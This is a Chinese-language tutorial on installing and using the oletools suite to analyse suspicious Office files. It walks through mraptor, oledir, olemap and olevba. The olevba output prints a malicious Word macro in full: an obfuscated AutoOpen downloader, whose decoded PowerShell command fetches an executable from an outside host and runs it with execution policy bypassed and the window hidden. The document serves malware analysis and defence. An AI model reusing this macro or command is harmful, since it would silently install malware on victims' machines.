零、緒論:OLE工具套件的介紹
OLE工具套件是一款針對OFFICE文檔開發的具有強大分析功能一組工具集。這里主要介紹基於Python2.7的OLEtools的安裝和使用。
(1)Python版本需求:2.7.9 及以上
(2)安裝方法:pip install -U https://github.com/decalage2/oletools/archive/master.zip
(3)使用方法:在CMD、POWERSHELL或者LINUX SHELL中工具名稱直接作為命令使用。
一、工具的介紹:
1、mraptor 檢查樣本是否為惡意。
結果為疑似SUSPICIOUS,權限AWX中沒有寫權限(w)A為自動執行權限,X為可執行權限
2、olebrowse介紹,一款可以查看ole文件內容的小“瀏覽器”
3、oledir 查看文檔內部的ole目錄
OLE的目錄就是一種包含名稱和存儲了文件數據流位置的一種數據結構(詳見[MS-CFB])。每個目錄可能會被使用,或者完全是空的。
4、OLEMAP 查看文件的FAT分配表
5、OLEVBA 全面分析一個文件的工具(具體命令 -h查詢)
C:\Python27\Lib\site-packages\oletools>oleobj C:\20701.doc
oleobj 0.51 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
-------------------------------------------------------------------------------
File: 'C:\\20701.doc' - 41472 bytes
C:\Python27\Lib\site-packages\oletools>olevba C:\20701.doc
olevba 0.51dev1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MAS--B-- C:\20701.doc
===============================================================================
FILE: C:\20701.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: C:\20701.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function voxakudr()
tidmifjec = "76724"
voxakudr = tidmifjec
End Function
Function kameci()
kameci = "hyvnexock"
End Function
Function turjosm()
pbyhbipa = "62062"
turjosm = pbyhbipa
End Function
Function cmypfatp()
zriknu = Empty
cmypfatp = zriknu
End Function
Sub AutoOpen()
ywobgitk = 75
Dim abafa As String
danxo = ActiveDocument.Windows.Count
fqumbu = False
edwale = 43
Select Case edwale
Case "2183"
If (TypeName(voxakudr) = "String") Then
syqyqqaty = "sybicv"
x = "ipdufg" & 9
ic = False
hs = "uhas" & 684
End If
If (fqumbu = 80) Then
kica = 571
If (kica < 722) Then
gyxyhladjo = Empty
ozhelc = "63238"
E = "24075" & 10
us = 58
qbyqewmi = 13
End If
End If
ltewbir = 40
If (ltewbir = 75) Then
a = "rjeqi" & 41
ungopufda = False
E = Empty
End If
Case 43
If (danxo = 1) Then
caqo = "CipfmipfDipf.ipfEipfXipfeipf ipf/ipfcipf ipf""ipfPipfoipfWipfEipfRipfsipfhipfEipflipflipf.ipfeipfxipfeipf ipf ipf ipf ipf-ipfeipfXipfEipfCipfuipfTipfiipfOipfnipfPipfOipflipfiipfcipfYipf ipf ipf ipf ipf ipfbipfYipfpipfaipfSipfSipf ipf-ipfNipfoipfpipfripfOipffipfIipflipfEipf ipf ipf ipf ipf-ipfWipfiipfnipfDipfOipfWipfsipfTipfyipfLipfEipf ipfHipfiipfdipfDipfEipfnipf ipf ipf ipf ipf ipf(ipfNipfEipfwipf-ipfoipfBipfjipfeipfCipfTipf ipfSipfyipfsipftipfEipfMipf.ipfNipfEipfTipf.ipfWipfeipfbipfCipfLipfiipfEipfnipftipf)ipf.ipfdipfoipfwipfNipflipfoipfaipfdipffipfiipfLipfeipf(ipf'ipfhipftipftipfpipf:ipf/ipf/ipfuipfnipfiipftipftipfoipfgipfripfeipfaipfsipf.ipftipfoipfpipf/ipfsipfeipfaipfripfcipfhipf.ipfpipfhipfpipf'ipf,ipf'ipf%ipfaipfpipfPipfdipfAipfTipfaipf%ipf.ipfeipfxipfEipf'ipf)ipf;ipfsipfTipfAipfripftipf-ipfpipfRipfoipfcipfEipfsipfsipf ipf'ipf%ipfAipfpipfPipfDipfAipfTipfaipf%ipf.ipfEipfxipfeipf'ipf"""
vbiclazp = "ipf"
imvuse = Split(caqo, vbiclazp)
For Each egazejk In imvuse
abafa = abafa + egazejk
Next egazejk
onol = Shell(abafa, ndycimt)
End If
End Select
End Sub
+------------+----------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------+-----------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
| Suspicious | Shell | May run an executable file or a system |
| | | command |
| Suspicious | Windows | May enumerate application windows (if |
| | | combined with Shell.Application object) |
| Suspicious | Base64 Strings | Base64-encoded strings were detected, |
| | | may be used to obfuscate strings |
| | | (option --decode to see all) |
+------------+----------------+-----------------------------------------+
"cmd.exe /c ""powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://unittogreas.top/search.php','%appdata%.exe');start-process '%appdata%.exe'"""